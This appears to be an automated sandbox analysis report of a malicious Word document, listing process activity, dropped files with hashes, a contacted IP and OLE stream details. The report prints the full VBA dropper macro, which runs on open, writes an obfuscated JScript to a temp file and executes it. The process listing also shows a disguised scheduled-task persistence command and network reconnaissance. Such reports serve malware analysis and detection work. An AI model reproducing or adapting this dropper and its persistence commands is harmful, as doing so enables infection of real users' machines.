cmd.exe (PID: 3512 cmdline: cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini MD5: AD7B9C14083B52BC532FBA5948342B98)

wscript.exe (PID: 3540 cmdline: wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini MD5: 979D74799EA6C8B8167869A68DF5204A)

schtasks.exe (PID: 3600 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

cmd.exe (PID: 3732 cmdline: 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml' MD5: AD7B9C14083B52BC532FBA5948342B98)

net.exe (PID: 3756 cmdline: net view MD5: B9A4DAC2192FD78CDA097BFA79F6E7B2)

cmd.exe (PID: 3884 cmdline: 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml' MD5: AD7B9C14083B52BC532FBA5948342B98)

ARP.EXE (PID: 3908 cmdline: arp -a MD5: ADC7AD3C261D2753CB7A2FE73A66C210)

taskeng.exe (PID: 3628 cmdline: taskeng.exe {6C8EBD0A-6843-4E76-AA78-1A12EAE50432} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1] MD5: 4F2659160AFCCA990305816946F69407)

wscript.exe (PID: 3664 cmdline: wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log MD5: 979D74799EA6C8B8167869A68DF5204A)

cmd.exe (PID: 3772 cmdline: 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 3928 cmdline: 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml' MD5: AD7B9C14083B52BC532FBA5948342B98)

ARP.EXE (PID: 3952 cmdline: arp -a MD5: ADC7AD3C261D2753CB7A2FE73A66C210)

wscript.exe (PID: 4040 cmdline: wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log MD5: 979D74799EA6C8B8167869A68DF5204A)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\Themes453.xml
File Type:	ASCII text, with CRLF line terminators
MD5:	FFBF840C65201C3E4B55770BCBBCE76C
SHA1:	302281235F3033ABCEFEB3C4E4D3F8E065C9544F
SHA-256:	AEF29C2E92E9CC496716403005A2E3A3CF4F38A2A9A5F4D32AE45097ED31E1BB
SHA-512:	239B1E072E4566E442152076532CD39EA8E3FCD8CAC44C628B5FE542F153359D3225123A976A13A6746406B5FCBD75F979083AC5A63AA28FCD2AC2AFC0E4CB76
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\Themes546.xml
File Type:	ASCII text, with CRLF line terminators
MD5:	FFBF840C65201C3E4B55770BCBBCE76C
SHA1:	302281235F3033ABCEFEB3C4E4D3F8E065C9544F
SHA-256:	AEF29C2E92E9CC496716403005A2E3A3CF4F38A2A9A5F4D32AE45097ED31E1BB
SHA-512:	239B1E072E4566E442152076532CD39EA8E3FCD8CAC44C628B5FE542F153359D3225123A976A13A6746406B5FCBD75F979083AC5A63AA28FCD2AC2AFC0E4CB76
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\VBE\MSForms.exd
File Type:	data
MD5:	4873935AD2999E59B2BC7516A0D82554
SHA1:	F22F6A92AED3FD5A613D55B0201188557D9C5175
SHA-256:	408CC39FCA0F8581EB48788DCB364B799EAC6533DF52891FB4AE4C630345755B
SHA-512:	02D75E8E4FCD974D9F771339FBB4083D455A0B72EF8A2ACB10898D6BD51E4609F49E4988993418831BA5CBC1383159FD00D9A23533DDC0FB9EA8EC6ADDF5D4ED
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\crashpad.ini
File Type:	ASCII C program text, with very long lines, with CRLF line terminators
MD5:	AAAFB05B0ADDF2B744EECDC2C757CB90
SHA1:	F7654885E85A3AA2998D6E966E838EF25B43B8BD
SHA-256:	44FD63AD6F050EF2C9461F5F53977B17234FB2F1C1EDD6632A74E5E2E5E51E5F
SHA-512:	4A5A7FCEB0B51B02554776CA619530520D556FD35423AB3FE44894A3A368BF29802711065A986182C293E240D33E52D089EC46E19A1AD5138F5ED121F6B6E268
Malicious:	true
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\main.xml
File Type:	ASCII English text, with CRLF line terminators
MD5:	637708A98E8A464EF7BFB87735260D3D
SHA1:	7D8563A107E9C30AD05B7052A82475F3DE1A9BB7
SHA-256:	C783E0AB4C32EBFA0349437C8058F2FE05F959CBC8068C344A4E287DF4D15CD7
SHA-512:	EF80C9FDCA0E118CE4949C1EC61849A3D6DD0719BAA5708DC80FAAE6A337092C2A2A66888D6EA361853226858ADD5A34F846F4ED10CEE1B37D3CEB201EFCDFE8
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\rytax.txt
File Type:	ASCII text, with CRLF line terminators
MD5:	D63B1B2BAA7842603CC19597B9F3DBAE
SHA1:	79754FE55FB74E79F804468B9AA51072C3E9F197
SHA-256:	11404A44CF84EECA5DBAF43D74B4E1A30952D0424CB5CE4FA22C2C1F0B5C73E6
SHA-512:	8D5ED9245AEB3180DE54A9EF17A34C6ADDB4E0A6A01029D958EF312CACF7D9E18D878F2AA079EF6219E227B59119950A611437E2C3FD6CE29C648F06749AE8C5
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BF00271-24C9-4607-AFE5-3A94DC919797}.tmp
File Type:	data
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\adjusted_records.LNK
File Type:	MS Windows shortcut
MD5:	59CEB3AAFB9B49A443DF794ED1AA4D0D
SHA1:	729D2678C8A345A2E96428A3FE9901443C23C542
SHA-256:	AE69B1242F205B4725F5086329A68C6A45807C4B3D0D974C4151007F0792E122
SHA-512:	9C22ABE3CAB4E7115BD3C61996185EF93CA870E9E1C3165C01AF6DFEE111A45D06631269ED1102933D54C092FD454DC795195B6A02937A783477AE879B6079EE
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type:	ASCII text, with CRLF line terminators
MD5:	B44447513CD72AB280BD753AE380183B
SHA1:	49844631D7E09595279C6EF76DBEF7414CF5D0F7
SHA-256:	86855EE4764321EF557FEFB715A50F988FC8F77CBB83B3923932DF3280E4BDBF
SHA-512:	5F23942630AE21F75FB8DE783A515C76C0F1528BD47EFD86261F94E8E01EADB301E814BA594785A8C9073D4861ACE2C13B3E558F1E2CE393FA98E14300BB6BEB
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
File Type:	data
MD5:	33DBB67576DE33CF6C5AB020315007BF
SHA1:	D34EA5DCA7C8AA5B8A8744B2F131B8C7077C484E
SHA-256:	67B0C0E029503F052B41F17E161352B552A71B9FFBF51D6AE3708DA918907F64
SHA-512:	8467EEED98CE9F989D5AC73048F130B4DB7819AFA595D275CE4439BB205E362EE6260661FEFF23071A7B12AF51577FA516BECDEF3865939132FF05B162636956
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
File Type:	ASCII C program text, with very long lines, with CRLF line terminators
MD5:	AAAFB05B0ADDF2B744EECDC2C757CB90
SHA1:	F7654885E85A3AA2998D6E966E838EF25B43B8BD
SHA-256:	44FD63AD6F050EF2C9461F5F53977B17234FB2F1C1EDD6632A74E5E2E5E51E5F
SHA-512:	4A5A7FCEB0B51B02554776CA619530520D556FD35423AB3FE44894A3A368BF29802711065A986182C293E240D33E52D089EC46E19A1AD5138F5ED121F6B6E268
Malicious:	true
Reputation:	low

C:\Users\user\Desktop\~$justed_records.doc
File Type:	data
MD5:	33DBB67576DE33CF6C5AB020315007BF
SHA1:	D34EA5DCA7C8AA5B8A8744B2F131B8C7077C484E
SHA-256:	67B0C0E029503F052B41F17E161352B552A71B9FFBF51D6AE3708DA918907F64
SHA-512:	8467EEED98CE9F989D5AC73048F130B4DB7819AFA595D275CE4439BB205E362EE6260661FEFF23071A7B12AF51577FA516BECDEF3865939132FF05B162636956
Malicious:	false
Reputation:	low

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	Flag	ASN	ASN Name	Malicious
85.93.2.148	Germany		203913	ARCOMPUS-MEDIANET-ASLB	true

Static File Info

General
File type:	CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: , Template: Normal.dotm, Last Saved By: , Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 07 15:35:00 2017, Last Saved Time/Date: Tue Nov 07 15:35:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
TrID:	Microsoft Word document (32009/1) 41.29% Microsoft Word document (old ver.) (19008/1) 24.52% Java Script (9000/0) 11.61% Generic OLE2 / Multistream Compound File (8008/1) 10.33% Visual Basic Script (6000/0) 7.74%
File name:	adjusted_records.doc
File size:	545280
MD5:	a00ae556a61907d43332449169c88844
SHA1:	74ab28527e0fd7009365018ff6a6eea63fc75a75
SHA256:	84dc0382a4c32cc54a5e92929827f97ee3ceaa50bee6c0831069e78c1144ee30
SHA512:	1e180b6c4f74dfddaabe74570abd1f059002c1c2fc2fc48f8d26fe66f8d125ffd95e3adc0b315e4ff8e15d364959f4bf7cf39e74f9a1b4c6e269cd36c69f8e62
File Content Preview:	........................>......................./...........2...............(...)...*...+...,...-.......I...J..................................................................................................................................................

File Icon

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "adjusted_records.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:
Template:	Normal.dotm
Last Saved By:
Revion Number:	2
Total Edit Time:	0
Create Time:	2017-11-08 15:35:00
Last Saved Time:	2017-11-08 15:35:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	1251
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 3135

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	3135
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . ( . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . S l e e p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 01 1c 01 00 00 c0 04 00 00 00 01 00 00 06 02 00 00 ff ff ff ff c7 04 00 00 a7 08 00 00 39 09 00 00 00 00 00 00 01 00 00 00 ca 5e a6 a9 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 28 00 00 00 00 00 34 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 6c 65 65 70 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff ff ff 00 00 00

VBA Code Keywords

Keyword
True)
ivwubka,
armando()
VB_Name
VB_Creatable
StrReverse("ini.daphsarc\")
VB_Exposed
ikgygke
"d.exe
avfasci.OpenTextFile(ikgygke,
ygtekra.Close
VB_TemplateDerived
(ByVal
failed!
AutoOpen()
ivwubka
armando
again"
Long)
"ript.exe
VB_Customizable
Split(vbspbopegh,
dwMilliseconds
CreateObject("Scripting.FileSystemObject")
vbspbopegh
ygtekra.WriteLine
agluksad
icrobbab
ygtekra
avfasci
"Decryption
/e:jsc"
"\|*\|")
PtrSafe
"ript
Declare
pbopegh
"ThisDocument"
False
Attribute
dacxitj
Private
Shell
VB_PredeclaredId
Sleep
VB_GlobalNameSpace
VB_Base
knyvlaql
MsgBox

VBA Code

Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = True

Attribute VB_Customizable = True

Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)



Sub armando()

    Dim ikgygke

    Dim pbopegh

    Dim vbspbopegh

    Dim kuqa

    Dim knyvlaql

    Dim agluksad

    Dim dacxitj

    Dim ivwubka

    Set avfasci = CreateObject("Scripting.FileSystemObject")

    Set icrobbab = avfasci.GetSpecialFolder(2)

    ikgygke = icrobbab & StrReverse("ini.daphsarc\")

    vbspbopegh = UserForm1.Label1.Caption

    Set ygtekra = avfasci.OpenTextFile(ikgygke, 2, True)

    For Each one In Split(vbspbopegh, "|*|")

    ygtekra.WriteLine one

    Next one

    ygtekra.Close

    kuqa = "d.exe /c wsc"

    knyvlaql = "ript.exe //b /e:jsc"

    agluksad = "ript "

    dacxitj = "c"

    ivwubka = dacxitj & "m" & kuqa & knyvlaql & agluksad & ikgygke

    Shell ivwubka, False

    MsgBox "Decryption failed! Try again"

End Sub

Sub AutoOpen()

    armando

End Sub

VBA File Name: UserForm1.frm, Stream Size: 1331

General
Stream Path:	Macros/VBA/UserForm1
VBA File Name:	UserForm1.frm
Stream Size:	1331
Data ASCII:	. . . . . . . . . Z . . . . . . . P . . . . . . . a . . . . . . . G . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f4 00 00 00 5a 03 00 00 d8 00 00 00 50 02 00 00 ff ff ff ff 61 03 00 00 b5 03 00 00 47 04 00 00 00 00 00 00 01 00 00 00 ca 5e d7 d1 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm1"

Attribute VB_Base = "0{6B6BF1FB-AD60-430D-9A4A-863E0DAD35DE}{CE2C7631-6144-406D-97FA-AA4F3584AE8A}"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = False

Attribute VB_TemplateDerived = False

Attribute VB_Customizable = False

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	Unicode text, UTF-32, big-endian
Stream Size:	4096
Entropy:	0.244062958454
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	Unicode text, UTF-32, big-endian
Stream Size:	4096
Entropy:	0.393283840733
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . M i c r o s o f t O f f i c e
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 1c 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 04 00 00 00 78 00 00 00 07 00 00 00 88 00 00 00 08 00 00 00 9c 00 00 00 09 00 00 00 ac 00 00 00 12 00 00 00 b8 00 00 00 0a 00 00 00 d8 00 00 00 0c 00 00 00 e4 00 00 00 0d 00 00 00 f0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6949

General
Stream Path:	1Table
File Type:	data
Stream Size:	6949
Entropy:	5.92751627912
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 393799

General
Stream Path:	Data
File Type:	data
Stream Size:	393799
Entropy:	7.7413813421
Base64 Encoded:	True
Data ASCII:	G . . . D . d . . . . . . . . . . . . . . . . . . . . . . H . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . C . . . ( . . . . A . . . . . . . . . . . . . . . . . . . . . . p . r . o . p . a . r . k . . . . . . . . . . . . . . . R . . . . . . . . . % . . . . L . ] X ` . . . . . ! . . . . . . . . . . D . . . . . = . . F . . { . . . % . . . . L . ] X ` . . . . . ! . . . . . . . E x i f . . I I * . . . . . . . . . . . . . . . . . D u c
Data Raw:	47 02 06 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 48 c6 66 80 02 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4c 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 28 00 00 00 04 41 01 00 00 00 05 c1 10 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 70 00 72 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 492

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF, CR line terminators
Stream Size:	492
Entropy:	5.34368161244
Base64 Encoded:	True
Data ASCII:	I D = " { F 9 A 5 5 E B 6 - 9 0 E 9 - 4 8 2 4 - 8 9 0 4 - 4 D 7 C 9 8 8 8 E 4 D 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 3 3 1 D B 2 A 0 A 2 E 0 A 2 E 0 A 2 E 0 A 2 E " . . D P B = " 6 6 6
Data Raw:	49 44 3d 22 7b 46 39 41 35 35 45 42 36 2d 39 30 45 39 2d 34 38 32 34 2d 38 39 30 34 2d 34 44 37 43 39 38 38 38 45 34 44 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	71
Entropy:	3.29226192431
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00

Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm1/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 291

General
Stream Path:	Macros/UserForm1/\x3VBFrame
File Type:	ASCII text, with CRLF, CR line terminators
Stream Size:	291
Entropy:	4.6035537314
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 1 3 3 7 . . C l i e n t L e f t = 2 1 . . C l i e n t T o p = 3 2 2 . . C l i e n t W i d t h = 2 1 9 8 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 94

General
Stream Path:	Macros/UserForm1/f
File Type:	data
Stream Size:	94
Entropy:	2.63195667756
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . } . . % . . . 6 . . . . . . . . . . . . . . . . . 0 . . . . . h o . . ( . . . . . . . . . . . . . 2 . . . . . . . . . . . L a b e l 1 . . . . . . . . . .
Data Raw:	00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 25 0f 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 30 00 00 00 00 01 68 6f 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 84 b7 01 00 00 00 15 00 4c 61 62 65 6c 31 00 00 d5 00 00 00 00 00 00 00

Stream Path: Macros/UserForm1/o, File Type: data, Stream Size: 112516

General
Stream Path:	Macros/UserForm1/o
File Type:	data
Stream Size:	112516
Entropy:	3.79176326
Base64 Encoded:	True
Data ASCII:	. . . . ( . . . T . . . / * \| * \| * C o p y r i g h t 2 0 0 5 G o o g l e , I n c . . \| * \| * A l l r i g h t s r e s e r v e d . \| * \| * v . 1 . 8 3 \| * \| * / \| * \| v a r j b o s y p t a n l e b i m e z u l z y m u t y b n u d m a z m a m o z t a n w i v o q s u m u f u q u q f a r u q m y z t y p i g e r u s x o n k y p y g u w f y f o q e c l a d y v u r h e m w i d f o j i m a d h u r y t s u n t e c s e g x a p a b n e k i f o b e t b i t o v e t o w y x t y b y l j a
Data Raw:	00 02 08 00 28 00 00 00 54 b7 01 80 2f 2a 7c 2a 7c 20 2a 20 20 43 6f 70 79 72 69 67 68 74 20 32 30 30 35 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 2e 2e 7c 2a 7c 20 2a 20 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 7c 2a 7c 20 2a 20 20 76 2e 20 31 2e 38 33 7c 2a 7c 20 2a 2f 7c 2a 7c 76 61 72 20 6a 62 6f 73 79 70 74 61 6e 6c 65 62 69 6d 65 7a 75 6c 7a 79 6d 75 74 79 62

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3522

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3522
Entropy:	4.38132542916
Base64 Encoded:	False
